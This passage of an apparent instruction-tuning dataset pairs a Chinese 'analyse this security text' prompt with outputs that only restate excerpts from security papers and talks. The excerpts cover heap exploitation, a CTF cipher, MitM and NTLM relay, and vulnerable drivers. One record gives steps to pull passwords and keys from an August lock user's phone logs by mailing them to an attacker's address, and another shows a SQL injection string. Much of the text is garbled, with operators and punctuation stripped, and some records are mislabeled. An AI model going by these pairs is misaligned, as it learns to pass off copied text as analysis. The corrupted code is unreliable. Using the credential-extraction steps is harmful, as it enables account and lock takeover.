DNS every minute using scutil and cron.  Perl script to call home.  Shell script, later obfuscated using  tr!  Polymorphism? 9 History  Lamware, 2007 10 History  Lamware, 2007 MacSweeper, later iMunizator  First scareware.  -(BOOL)[RegistrationManager isRegistered] and patch a few bytes  And it really works!  Prequel of MacDefender and", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### large bin attack概述 这种攻击方式主要利用的是 chunk 进入 bin 中的操作在 malloc 的时候遍历 unsorted bin 时对每一个 chunk若无法 exact-fit 分配或不满足切割分配的条件就会将该 chunk 置入相应的 bin 中而此过程中缺乏对 largebin 的跳表指针的检测 以 2.33 版本的 libc 为例从 4052 行开始就是对 largebin chunk 的入 bin 操作 ```cpp else { victim_index = largebin_index (size); bck = bin_at (av, victim_index); fwd = bck->fd; /* maintain large bins in sorted order */ if (fwd != bck) { /* Or with inuse bit to speed comparisons */ size |= PREV_INUSE; /* if smaller than smallest, bypass loop below */ assert (chunk_main_arena (bck->bk)); if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk)) { fwd = bck; bck = bck->bk; victim->fd_nextsize = fwd->fd; victim->bk_nextsize = fwd->fd->bk_nextsize; fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim; } else { assert (chunk_main_arena (fwd)); while ((unsigned long) size < chunksize_nomask (fwd)) { fwd = fwd->fd_nextsize; assert (chunk_main_arena (fwd)); } if ((unsigned long) size == (unsigned long) chunksize_nomask (fwd)) /* Always insert in the second position. */ fwd = fwd->fd; else { victim->fd_nextsize = fwd; victim->bk_nextsize = fwd->bk_nextsize; if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd)) malloc_printerr (\"malloc(): largebin double linked list corrupted (nextsize)\"); fwd->bk_nextsize = victim; victim->bk_nextsize->fd_nextsize = victim; } bck = fwd->bk; if (bck->fd != fwd) malloc_printerr (\"malloc(): largebin double linked list corrupted (bk)\"); } } ``` 在 2.29 及以下的版本中根据 unsorted chunk 的大小不同 ```cpp fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim; victim->bk_nextsize->fd_nextsize = victim; ``` 在 unsorted chunk 小于链表中最小的 chunk 的时候会执行前一句反之执行后一句 由于两者大小相同的时候只会使用如下的方法插入所以此时无法利用 ```cpp if ((unsigned long) size == (unsigned long) chunksize_nomask (fwd)) /* Always insert in the second position. */ fwd = fwd->fd; ``` 所以有两种利用方法 在 2.30 版本新加入了对 largebin 跳表的完整性检查使 unsorted chunk 大于链表中最小的 chunk 时的利用失效必须使 unsorted chunk 小于链表中最小的 chunk通过 ```cpp victim->bk_nextsize->fd_nextsize =", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 剑指 Offer 题解 ## 前言 题目来自何海涛. 剑指 Offer[M]. 电子工业出版社, 2012.刷题网站推荐 - [牛客网](https://www.nowcoder.com/ta/coding-interviews?from=cyc_github) - [Leetcode](https://leetcode-cn.com/problemset/lcof/) ## 数组与矩阵 - [3. 数组中重复的数字](3.%20数组中重复的数字.md) - [4. 二维数组中的查找](4.%20二维数组中的查找.md) - [5. 替换空格](5.%20替换空格.md) - [29. 顺时针打印矩阵](29.%20顺时针打印矩阵.md) - [50. 第一个只出现一次的字符位置](50.%20第一个只出现一次的字符位置.md) ## 栈队列堆 - [9. 用两个栈实现队列](9.%20用两个栈实现队列.md) - [30. 包含 min 函数的栈](30.%20包含%20min%20函数的栈.md) - [31. 栈的压入弹出序列](31.%20栈的压入弹出序列.md) - [40. 最小的 K 个数](40.%20最小的%20K%20个数.md) - [41.1 数据流中的中位数](41.1%20数据流中的中位数.md) - [41.2 字符流中第一个不重复的字符](41.2%20字符流中第一个不重复的字符.md) - [59. 滑动窗口的最大值](59.%20滑动窗口的最大值.md) ## 双指针 - [57.1 和为 S 的两个数字](57.1%20和为%20S%20的两个数字.md) - [57.2 和为 S 的连续正数序列](57.2%20和为%20S%20的连续正数序列.md) - [58.1 翻转单词顺序列](58.1%20翻转单词顺序列.md) - [58.2 左旋转字符串](58.2%20左旋转字符串.md) ## 链表 - [6. 从尾到头打印链表](6.%20从尾到头打印链表.md) - [18.1 在 O(1) 时间内删除链表节点](18.1%20在%20O(1)%20时间内删除链表节点.md) - [18.2 删除链表中重复的结点](18.2%20删除链表中重复的结点.md) - [22. 链表中倒数第 K 个结点](22.%20链表中倒数第%20K%20个结点.md) - [23. 链表中环的入口结点](23.%20链表中环的入口结点.md) - [24. 反转链表](24.%20反转链表.md) - [25. 合并两个排序的链表](25.%20合并两个排序的链表.md) - [35. 复杂链表的复制](35.%20复杂链表的复制.md) - [52. 两个链表的第一个公共结点](52.%20两个链表的第一个公共结点.md) ## 树 - [7. 重建二叉树](7.%20重建二叉树.md) - [8. 二叉树的下一个结点](8.%20二叉树的下一个结点.md) - [26. 树的子结构](26.%20树的子结构.md) - [27. 二叉树的镜像](27.%20二叉树的镜像.md) - [28. 对称的二叉树](28.%20对称的二叉树.md) - [32.1 从上往下打印二叉树](32.1%20从上往下打印二叉树.md) - [32.2 把二叉树打印成多行](32.2%20把二叉树打印成多行.md) - [32.3 按之字形顺序打印二叉树](32.3%20按之字形顺序打印二叉树.md) - [33. 二叉搜索树的后序遍历序列](33.%20二叉搜索树的后序遍历序列.md) - [34. 二叉树中和为某一值的路径](34.%20二叉树中和为某一值的路径.md) - [36. 二叉搜索树与双向链表](36.%20二叉搜索树与双向链表.md) - [37. 序列化二叉树](37.%20序列化二叉树.md) - [54. 二叉查找树的第 K 个结点](54.%20二叉查找树的第%20K%20个结点.md) - [55.1 二叉树的深度](55.1%20二叉树的深度.md) - [55.2 平衡二叉树](55.2%20平衡二叉树.md) - [68. 树中两个节点的最低公共祖先](68.%20树中两个节点的最低公共祖先.md) ## 贪心思想 - [14. 剪绳子](14.%20剪绳子.md) - [63. 股票的最大利润](63.%20股票的最大利润.md) ## 二分查找 - [11. 旋转数组的最小数字](11.%20旋转数组的最小数字.md) - [53. 数字在排序数组中出现的次数](53.%20数字在排序数组中出现的次数.md) ## 分治 - [16. 数值的整数次方](16.%20数值", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe August application logs a significant amount of sensitive data. With social engineering, or temporary access to the unlocked phone of an August user these logs can be extracted. The following procedure can be use to extract log data without the use of any special tools. Step 1: Open settings Step 2: Press and hold the application version number. Step 3: Enter \"augustsupport\" in the prompt. The prompt is case sensitive. (\"DreadfulDow\" can be used as well, but it permanently alters the app's settings.) Step 4: Tap send logs to August. Step 5: Change the destination to an email address you control. These logs which are ostensibly useful August support may include usernames, passwords, authentication tokens, offline keys, and firmware keys as shown in the following screenshot: Of note, the information extracted from log files by the above program is sufficient to not only interact with the lock, but also to bypass August's two step authentication system.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nToxic Proxies - Bypassing HTTPS & VPNs to pwn your online identity Alex Chapman @noxrnet Paul Stone @pdjstone Introduction Our Talk Exciting introduction Some history  SSL, PAC, WPAD, sslstrip, HSTS The PAC Attack  bypassing HTTPS  Sniffing your traffic  Stealing your data  Stealing your accounts The VPN Attack  bypassing VPNs Mitgations Fixes Rogue Access Point Attacks Techniques in this talk assume an attacker on the local network, e.g.  Open WiFi network  Attacker on a corporate network  Compromised router Can intercept and modify all non encrypted traffic Can carry out local-network attacks on victims First there was no encryption Sure, why not  its 1993! Then there was SSL Problem: No encryption for sensitive websites Solution: Opt-in encryption, certificates to verify domain ownership Netscape 2 ships with SSL in 1995 Users somewhat safe from passive traffic sniffing attacks But SSL wasnt perfect Many Problems:  Most websites allow connecting over HTTP and HTTPS  Most people connect over HTTP first, site redirects to HTTPS  Evil MITM can prevent user reaching HTTPS site Solution: ??? sslstrip released in 2009 - https://moxie.org/software/sslstrip/  Man-in-the-middle HTTP proxy  Remove redirects to HTTPS  Rewrite HTTPS links to HTTP  Fetch HTTPS-only pages and serve as HTTP  User never actually reaches the real HTTPS site But SSL wasnt perfect HSTS to the rescue! Problem: sslstrip broke HTTPS by just ignoring it Solution: force browser to always use HTTPS HTTP-Strict-Transport-Security header  2010  Removes vulnerable HTTP -> HTTPS redirect Strict-Transport-Security: max-age=31536000; includeSubDomains Proxy Auto-Config (PAC) Problem: Complex intranets require different HTTP proxies depending on which website you want to visit, e.g.:  proxyA.initech.corp for most intranet sites  proxyB.initech.corp for access to preprod sites  proxyC.initech.corp for public internet access Solution: JavaScript file to tell browser which proxy to use for each URL Navigator Proxy", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTruck Duck Board Bill of Materials June 2016 - DEF CON 24 CHECK FOR UPDATES AT: http://truckhacking.github.io Designator(s) Description Package/Footprint Qty Manufacturer Part Number Preferred Vendor Subsitute OK? Notes D1 Power LED 0805 1 OSRAM LG R971-KN-1 Digikey Y PTC1 Thermal Fuse, 2A Hold, 4A Trip Custom 1 LittleFuse 2920L200/24DR Digikey N TVS1 Transient Voltage Suppressor DO-214AC 1 Bourns SMAJ30A Digikey Y Q1 Reverse Polarity Protection FET SOIC8 1 Internation Rectifier IRF9388TRPBF Digikey N VR1 Switching Voltage Regulator TO-220 (Inverted) 1 Murata OKI-78SR-5/1.5-W36H-C Digikey N P1 ,P2 BeagleBone Header 0.100\" Header 2 Sullins PRPC023DAAN-RC Digikey Y P3, P4 Screw Terminal Custom 2 Phoenix Contact 1725685 Digikey N U1, U8 J1708 (RS485) Tranceiver SOIC8 2 Texas Instruments SN65HVD08D Digikey N U2, U7 Inverter for J1708 SOT-23-5 2 Fairchild Semi NC7SZ04M5X Digikey N U3, U4 CAN Bus Tranceiver SOIC8 2 Texas Instruments SN65HVD232DR Digikey N U6 Buffer/Bi-directional Level Shifter TSSOP-20 1 Texas Instruments TXS0108EPWR Digikey N J1 DSUB-15 Vehicle Connector DSUB-15 1 FCI ID15S33E4GX00LF Mouser Y Substitute TE 1-1634585-2 R1 Power LED Resistor 0805 1 Panasonic ERJ-6ENF4700V Digikey Y C1 100uF 50V Aluminum Electrolytic Capacitor 6.3x7.7 SMD 1 Nichicon UCM1H101MCL1GS Digikey Y C2 47uF 10V Ceramic Capacitor 1206 1 Taiyo Yuden LMK316BJ106KLHT Digikey Y C3, C4, C5, C6 560pF Ceramic Filter Cap, CAN Lines 0603 4 Kemet C0603C561J5GACTU Digikey Y R3, R4, R6, R7 100 Ohm Resistor, CAN Bus 0603 4 Panasonic ERJ-3EKF1000V Digikey Y R2, R5, R8, R11, R12, R15, R16 4.7K Pull Up/Down Resistors 0603 7 Panasonic ERJ-3EKF4701V Digikey Y R9, R10, R13, R14 47 Ohm Resistors, J1708 Bus 0603 4 Panasonic ERJ-3GEYJ470V Digikey Y C7 0.1 uF Bypass Cap for Level Shifter 0603 1 AVX 0603YC104KAT2A Digikey Y PCB Printed Circuit Board Custom 1 Many NA Many N", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### 堆利用介绍 在该章节中我们会按照如下的步骤进行介绍 1. 介绍我们所熟知的动态内存分配的堆的宏观操作 2. 介绍为了达到这些操作所使用的数据结构 3. 介绍利用这些数据结构实现堆的分配与回收的具体操作 4. 由浅入深地介绍堆的各种利用技巧 对于不同的应用来说由于内存的需求各不相同等特性因此目前堆的实现有很多种具体如下 ```text dlmalloc  General purpose allocator ptmalloc2  glibc jemalloc  FreeBSD and Firefox tcmalloc  Google libumem  Solaris ``` 这里我们主要以 glibc 中堆的实现为主进行介绍如果后续有时间会继续介绍其它堆的实现及其利用 该部分主要参考的资料如下文中有很多内容会和参考资料中一致以后就不一一说明了 - [black hat heap exploitation](https://www.blackhat.com/presentations/bh-usa-07/Ferguson/Whitepaper/bh-usa-07-ferguson-WP.pdf) - [github heap exploition](https://heap-exploitation.dhavalkapil.com/) - [sploitfun](https://sploitfun.wordpress.com/archives/) - glibc 源码 - 更多的参考文献请看ref目录下的文件", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAdventures in MitM-land Using MITM to Attack Active Directory Authentication Schemes About Us  Senior Engineer @CrowdStrike (Former @Preempt)  Extensive background as a security researcher Sagi Sheinfeld (@sagish1233)  Senior Engineer @CrowdStrike (Former @Preempt)  Previously presented on Black Hat Eyal Karni (@eyal_karni)  Senior Manager, Engineering @CrowdStrike  2xBlack Hat, 1xDEFCON Yaron Zinar (@YaronZi) Is MITM an Important Technique?  Sometimes  Works when other techniques fail  Often overlooked  Active Directory  Relatively old protocols  Usually dont use TLS NTLM Basics Authentication is not bound to the target server! (1) NTLM Negotiate (3) NTLM Authenticate (2) NTLM Challenge (4) NETLOGON (5) Approve/Reject Client Machine Server DC Kerberos Basics (5) AP-Req Client Machine Server DC (1) AS-Req (2) AS-Rep (3) TGS-Req (4) TGS-Rep Signed with servers secret Kerberos vs. NTLM NTLM Kerberos Proteted from Offline Cracking   (except X-roasting) Can Work w/o Storing Hash in RAM   Supports Mutual Authentication   Smart Card Support   Hashes Contain Salt   (except RC4) NTLM Relay 101 (1) NTLM Negotiate (5) NTLM Authenticate (4) NTLM Challenge (7) NETLOGON (8) Approve Client Machine Server (2) NTLM Negotiate (6) NTLM Authenticate (3) NTLM Challenge Attacked Target DC NTLM Relay over DCE/RPC  First suggested by Sylvain Heiniger (@sploutchy)  Found (at least) one interface (TSCH) with no server signing  Used NTLM Relay to create a new scheduled task DCE/RPC Relay Mitigation is Broken https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/425a7c53-c33a-4868-8e5b-2a850d40dc73 Printer Spooler LPE (CVE-2020-1048)  Discovered by Peleg Hadar (@peleghd) and Tomer Bar  For printing, you need a driver, and a port  Any user can install a printer driver (from a pre-existing list)  Generic/ Text can write anything...  The port can be a file instead  We can write arbitrary files  It is a privileged process, and the access checks are done on the client side  We have ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHome Invasion 2.0 Attacking Network-Connected Embedded Devices 0. Abstract 1. Introduction 2. Methodology for devices evaluated 2.1 Belkin WeMo switch 2.2 MiCasaVerde VeraLite 2.3 INSTEON Hub 2.4 Karotz Smart Rabbit 2.5 Linksys Media Adapter 2.6 Lixil Satis Smart Toilet 2.7 Radio Thermostat 2.8 Sonos Bridge 3. Results 3.1 Belkin WeMo switch 3.1.1 Vulnerable libupnp version 3.1.2 Unauthenticated UPnP actions 3.1.2.1 SetBinaryState 3.1.2.2 SetFriendlyName 3.1.2.3 UpdateFirmware 3.2 MiCasaVerde VeraLite 3.2.1 Lack of authentication on web console by default 3.2.2 Lack of authentication on UPnP daemon 3.2.3 Path Traversal 3.2.4 Insufficient Authorization Checks 3.2.4.1 Firmware Update 3.2.4.2 Settings backup 3.2.4.3 Test Lua code 3.2.5 Server Side Request Forgery 3.2.6 CrossSite Request Forgery 3.2.7 Unconfirmed Authentication Bypass 3.2.8 Vulnerable libupnp Version 3.3 INSTEON Hub 3.3.1 Lack of authentication 3.4 Karotz Smart Rabbit 3.4.1 Exposure of wifi network credentials unencrypted to the Karotz server 3.4.2 Python module hijack in wifi setup 3.4.3 Unencrypted remote API calls 3.5 Linksys Media Adapter 3.5.1 Unauthenticated UPnP actions 3.6 LIXIL Satis Smart Toilet 3.6.1 Default Bluetooth PIN 3.7 Radio Thermostat 3.7.1 Unauthenticated API 3.7.2 Disclosure of WiFi passphrase in old firmware versions 3.8 SONOS Bridge 3.8.1 Support Console Information Disclosure 4. Discussion 0. Abstract We evaluated the security of several networkconnected embedded devices marketed for home use. While network connectivity is already commonplace for personal computers, mobile devices such as smartphones, printers, and digital storage units, there are a growing number of networkconnected devices that do not fit these traditional categories. With some of these devices, a compromise would allow an attacker some control over the physical world, posing a different type of risk than that associated with a personal computer. We selected our research targets based on capabilities, availabili", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCOMMON VULNERABILITIES COMMON VULNERABILITIES In this document you can find common vulnerabilities that are reported commonly. We believe that verifying this list and fixing these issues or adding it to out of scope ahead of the start of the project might save you some budget! EXCESSIVE INFORMATION LEAKAGE TROUGH ERRORS/STACK TRACES [ Description ] Websites can leak information about internal services in all kinds of ways but most often this happens because of very excessive errors. Usernames, full paths to internal documents are some examples of information leakage. [ Solution ] Turn off all excessive errors or limit their content to a short description of the problem. LOGIN/LOGOUT/NEWSLETTER CSRF [ Description ] This is often reported as best practice but 99% of these reports are harmless and do not describe a real security risk. [ Solution ] Implement a CSRF protection mechanism that applies to all forms and even protects logged out users. This will also protect against CSRF on newsletter subscription forms. 2 1 SSL CERTIFICATE ISSUES [ Description ] Some websites require a specific SSL setup and are intentionally vulnerable to some low severity SSL attacks. Make sure to check your SSL security at the following two sites: https://www.digicert.com/help/ https://www.ssllabs.com/ssltest/ If your company is vulnerable to a very specific SSL attack and you do not want to fix this because the likelihood of such an attack happening is very low make sure to mention this in the program policy. [ Solution ] Make sure that your SSL connection is completely secure, youll already get a lot of input from the tests mentioned above. REFERENCES TO INTERNAL SERVICES/IP [ Description ] Make sure that no internal IP/hosts are being disclosed publicly, this often happens in response headers, comment sections in code. Load balancers often inject a comment at the end of an HTML page, make sure this is turned off. [ Solution ] Take a look at where this might occur and then remove it. No", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 比特攻击 ## 概述 简单地说就是利用比特位之间的关系进行攻击 ## 2018 Plaid CTF transducipher 题目如下 ```python #!/usr/bin/env python3.6 import os BLOCK_SIZE = 64 T = [ ((2, 1), 1), ((5, 0), 0), ((3, 4), 0), ((1, 5), 1), ((0, 3), 1), ((4, 2), 0), ] def block2bin(b, length=BLOCK_SIZE): return list(map(int, bin(b)[2:].rjust(length, '0'))) def bin2block(b): return int(\"\".join(map(str, b)), 2) def transduce(b, s=0): if len(b) == 0: return b d, t = T[s] b0, bp = b[0], b[1:] return [b0  t] + transduce(bp, s=d[b0]) def transduceblock(b): return bin2block(transduce(block2bin(b))) def swap(b): l = BLOCK_SIZE // 2 m = (1 << l) - 1 return (b >> l) | ((b & m) << l) class Transducipher: def __init__(self, k): self.k = [k] for i in range(1, len(T)): k = swap(transduceblock(k)) self.k.append(k) def encrypt(self, b): for i in range(len(T)): b = self.k[i] b = transduceblock(b) b = swap(b) return b if __name__ == \"__main__\": flag = bytes.hex(os.urandom(BLOCK_SIZE // 8)) k = int(flag, 16) C = Transducipher(k) print(\"Your flag is PCTF{%s}\" % flag) with open(\"data1.txt\", \"w\") as f: for i in range(16): pt = int(bytes.hex(os.urandom(BLOCK_SIZE // 8)), 16) ct = C.encrypt(pt) f.write(str((pt, ct)) + \"\\n\") ``` 题目给了 16 组明密文对 - 明文大小 8 个字节 - 密文大小 8 个字节 - 密钥大小也是 8 个字节 我们所需要求解的就是密钥 可以看到这里主要有两种基本操作 - swap ```python def swap(b): l = BLOCK_SIZE // 2 m = (1 << l) - 1 return (b >> l) | ((b & m) << l) ``` 将给定的数据的高 32 位与低 32 位交换 - transduce ```python T = [ ((2, 1), 1), ((5, 0), 0), ((3, 4), 0), ((1, 5), 1), ((0, 3), 1), ((4, 2), 0), ] def transduce(b, s=0): if len(b) == 0: return b d, t = T[s] b0, bp = b[0], b[1:] return [b0  t] + transduce(bp, s=d[b0]) ``` 其中 - b 是一个 01 数组初始时刻大小为 64 - s 是一个下标 基本流程如下 1. 根据 s 选择使用 T 的哪个元素进而将其分为 d 和 t 2. 将 b 分为两部分一部分只包含头元素另一部分包含其它的元素 3. 将头元素与 t 异或作为当前的头元素然后继续转换剩下的部分 其实我们可以将该函数转换为迭代函数 ```python def transduce_iter(b, s=0): ans = [] for c in b: d, t = T[s] ans += [c  t] s = d[c] return ans ``` 进而由于每次处理的是列表的第一个元素其实该函数是可逆的如下 ```python def invtransduce(b, s=0): if len(b) == 0: return b d, t = T[s] b0, bp = b", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Emperor Has No Cloak  WEP Cloaking Exposed Vivek Ramachandran ( vivek.ramachandran@airtightnetworks.net ) Deepak Gupta ( deepak.gupta@airtightnetworks.net ) Security Research Team (Amit, Gopi, Pravin) AirTight Networks www.airtightnetworks.net Background Claim: WEP key cracking can be prevented using WEP Chaffing. Question: Is it safe to use WEP again now that we have a cloak for it? Vendor aims to Cloak WEP, April 2007  .. [Cloaking] is designed to protect a widely used but flawed wireless LAN encryption protocol ..  .. Cloaking module creates dummy data traffic ... attacker cant tell the difference between product frames from the WLAN and spoofed frames generated ..  Important Note Our presentation this afternoon concerns a technique that we refer to as \"chaff insertion,\" which recently has been proposed as a way to prevent cracking WEP keys. To avoid any confusion, while our abstract may have mentioned \"WEP Cloaking,\" and while we may mention \"WEP Cloaking\" during the course of our presentation, it should be noted that WEP Cloaking is the name one company is using to refer to its particular implementation of the chaff insertion technique. Our presentation is not intended as an analysis of or commentary on this company's particular implementation, but rather addresses the technique of chaff insertion in general and demonstrates our belief that the approach is easily defeated and does not provide any useful protection against cracking WEP keys. Talk Outline Evolution of WEP Cracking What is WEP Chaffing? What are Chaff packets? WEP Chaffing example Techniques to counter different types of Chaff: Random frames Single key Multiple keys Random keys  Implementation problems with WEP Chaffing Final verdict on WEP Chaffing Q&A Talk Outline Evolution of WEP Cracking What is WEP Chaffing? What are Chaff packets? WEP Chaffing example Techniques to counter different types of Chaff: Random frames Single key Multiple keys Random keys  Implementation problems with WEP Chaff", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nStalking a City for Fun and Frivolity Pull pin, point toward privacy insurance claimant DRAFT SLIDES Please go to http://www.maliceafterthought.com for updated slides Brendan OConnor Malice Afterthought, Inc. Hi! Im Brendan  CTO/DSS, Malice Afterthought  Law Student: IANAL(Y)  Anything you hear in this presentation isnt legal advice  Most of it isnt even a good idea  Youve been warned Quick Tangent: Weev  U.S. v. Auernheimer  Brief of Meredith Patterson, Brendan O'Connor, Sergey Bratus, Gabriella Coleman, Peyton Engel, Matthew Green, Dan Hirsch, Dan Kaminsky, Samuel Liles, Shane MacDougall, Brian Martin, C.\\ Thomas, and Peiter Zatko as Amici Curiae Supporting Appellant -- I got to write this!  Still, though: IANAL. Yet. (One more year!) DARPA Cyber Fast Track  CREEPYDOL IS NOT CFT WORK. I CANNOT EMPHASIZE THIS ENOUGH: DARPA CFT WAS NOT IN THE BUSINESS OF HAVING ME CREATE CREEPY THINGS.  That said, two CFT contracts did let me build two of the core systems: Reticle, and the visualization system.  Thanks! Foreword: Democratizing Surveillance http://www.flickr.com/photos/68979377@N00/3745750194 I. Foreword: The Democratization of Surveillance A. \"Security is really the government's area.\" 1. This was actually said to me by my sister recently, indicating that I'm failing in my duty to educate my family. 2. Those of us in this room know that the government isn't very good at securing things by means *other* than throwing them in prison for large amounts of time. 3. Nonetheless, the government has a near-monopoly on surveillance. Only the Good Guys http://www.flickr.com/photos/chberge/3753079527 4. When it doesn't, the perception of the general public is that \"only good guys\" have access to terrifying surveillance technology. This is *our fault* for not correcting this misperception, though groups reporting on, e.g., all the BlueCoat boxes they've found in repressive governments are certainly helping. Heck, PRISM was leaked, and this is *still* the thing Im hearing: people ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 (SSDLC) TWISC@NCKU 2 (SSDLC) 3 1-1 1-2 4 1-1 5 (System Development Life Cycle, SDLC)  (Define)  6  (Design)   (Develop)  7  (Test)   (Deploy)  8  (Maintain)   (Change)  XXX YYY 9 SDLC v.s. SSDLC SDLC   SQL Injection SSDLC  10 11 1-2 12 12 Web Web  (SSDLC) (SSDLC) 13 2-1 2-2 2-3 2-4 2-5 2-6 2-7 14 2-1 15 16  1. 2. hacker 17  3. 4. 18  5. 6. N 1. (Define) 1.1 1.2 1.3 1.4 1.5 1.6 1.7 20 2-2 21 1 4  3 2 22      23     24        25 N 2.1 (Design) 2.1.1 2.2 (Design) 2.2.1 2.3 (Design) 2.3.1 2.3.2 2.3.3 2.3.4 2.3.5 2.3.6 2.4 (Design) 2.4.1 2.4.2 2.4.3 SSL 26 2-3 27 Web II   28     aeg1423p mqi52le6 onhq4i6b 29     30     31     hacker 32   33 N 3.1 (Develop) 3.1.1 SQL Injection 3.1.2 3.2 (Develop) 3.2.1 3.2.2 3.3 (Develop) 3.3.1 3.3.2 3.3.3 34 N 3.4 (Develop) 3.4.1 3.4.2 Default Accounts Passwords 3.4.3 3.5 (Develop) 3.5.1 3.5.2 3.5.3 3.6 (Develop) 3.6.1 3.6.2 3.6.3 Buffer Overflow 3.6.4 N 3.7 (Develop) 3.7.1 3.7.2 3.7.3 3.7.4 3.8 (Develop) 3.8.1 3.8.2 3.8.3 Session Validation Attacks 3.8.4 36 N 3.9 (Develop) 3.9.1 3.9.2 3.9.3 3.10 (Develop) 3.10.1 3.10.2 3.10.3 Brute-Forcing 3.10.4 37 2-4 38    39    update OK 40     ID A123654827 41 N 4.1 (Test) 4.1.1 4.1.2 4.1.3 4.1.4 4.2 (Test) 4.2.1 4.2.2 4.3 (Test) 4.3.1 4.3.2 42 2-5 43    XXXX.. YYYY.. 44       V.1.0 XXX YYY. V.2.0 XXX YYY. 45 N 5.1 (Deploy) 5.1.1 5.2.2 5.2.3 5.2 (Deploy) 5.2.1 5.2.2 5.2.3 5.3 (Deploy) 5.3.1 5.3.2 46 2-6 47  RFP   48 N 6. (Maintain) 6.1 RFP 6.2 6.3 6.4 6.5 49 2-7 50 51       52    1. 2. ? 0131( ) 53    XXX YYY. 54 N 7.1 (Change) 7.1.1 7.1.2 7.2 (Change) 7.2.1 7.3 (Change) 7.3.1 7.3.2 7.3.3 7.4 (Change) 7.4.1 7.4.2 7.4.3 55 3-1 56      Web Web 57 - Web  ASP, JSP...  Web   ASP JSP PHP 58 -    ( VPN..)  59     60     61   ( )     62 - Web  SQL Injection  Web  (Backup test)  (Web Server configuration security test)  (Web Server application weakness test)  or 1=1-- 123 63 -  (Host weakness test)  (Host configuration Security test)  (Connection backup test)  (Fault-Tolerance test)   64    65 - Web    SQ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJesse Michael Mickey Shkatov @JesseMichael @HackingThings WHO ARE WE AGENDA  Beginning  .  .  .  .  Conclusions  Q&A  Diego Juarez  https://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities  https://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-privilege-vulnerabilities  https://www.secureauth.com/labs/advisories/asrock-drivers-elevation-privilege-vulnerabilities  @ReWolf  https://github.com/rwfpl/rewolf-msi-exploit + Blog post link in Readme  @NOPAndRoll (Ryan Warns) / Timothy Harrison  https://downloads.immunityinc.com/infiltrate2019-slidepacks/ryan-warns-timothy-harrison-device- driver-debauchery-msr-madness/MSR_Madness_v2.9_INFILTRATE.pptx  @SpecialHoang  https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition- e73ee523598b PRIOR WORK BACKGROUND Application Windows OS Driver Device BACKGROUND Application Windows OS Driver Device REQUEST MAGIC REQUEST DeviceIoControl(dev, ioctl, inbuf, insize, ...) IOCTL handler in driver called with IRP struct  contains args passed from userspace 2.3. Windows drivers 2.3.1. Signed 2.3.2. WHQL signed 2.3.3. EV signing cert (A Must for Win10 signing process) Briefly explain the process of signing code HOW ITS MADE  RWEverything  LoJax  Slingshot  Game Cheats and Anti-Cheats (CapCom and others)  MSI+ASUS+GIGABYTE+ASROCK KNOWN THREATS  Utility to access almost all hardware interfaces via software  User-space app + signed RwDrv.sys driver  Driver acts as a privileged proxy to hardware interfaces  Allows arbitrary access to privileged resources not intended to be available to user-space  CHIPSEC helper to use RwDrv.sys when available Read & Write Everything  First UEFI malware found in the wild  Implant tool includes RwDrv.sys driver from RWEverything  Loads driver to gain direct access to SPI controller in PCH  Uses direct SPI controller access to rewrite UEFI firmware LoJax  APT campaign brought along its own malicious driver  Active from 201", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n**Authors**: < [nixawk](https://github.com/nixawk) >, < [sjas](https://github.com/sjas) > ---- # Vulnerability Assessment Having identified the most viable attack methods, you need to consider how you will access the target. During vulnerability analysis, you combine the information that youve learned from the prior phases and use it to understand what attacks might be viable. Among other things, vulnerability analysis takes into account port and vulnerability scans, data gathered by banner grabbing, and information collected during intelligence gathering. |**Assessment Categroy**|**Bookmarks**| |:----------------------|:------------| |Network Assessment || |Web Application Assessment|| |Database Assessment|| # Links 1. http://www.exploit-db.com/ 2. http://www.cvedetails.com/ 3. http://packetstormsecurity.com/ 4. http://www.securityfocus.com/bid 5. http://nvd.nist.gov/ 6. http://osvdb.org/ 7. http://cve.mitre.org/ 8. http://sec.jetlib.com/ 9. http://0day.today/ 10. https://www.seebug.org/ 11. https://www.rapid7.com/db/ 12. http://zerodayinitiative.com/advisories/published/ 13. http://exploitsearch.net/ 14. http://nvd.nist.gov/download/nvd-rss-analyzed.xml 15. http://www.intelligentexploit.com/ 16. https://wpvulndb.com/ 17. http://www.wordpressexploit.com/ 18. http://www.drupalexploit.com/ 19. http://www.openwall.com/lists/oss-security/ 20. http://exploitsearch.net/ 21. 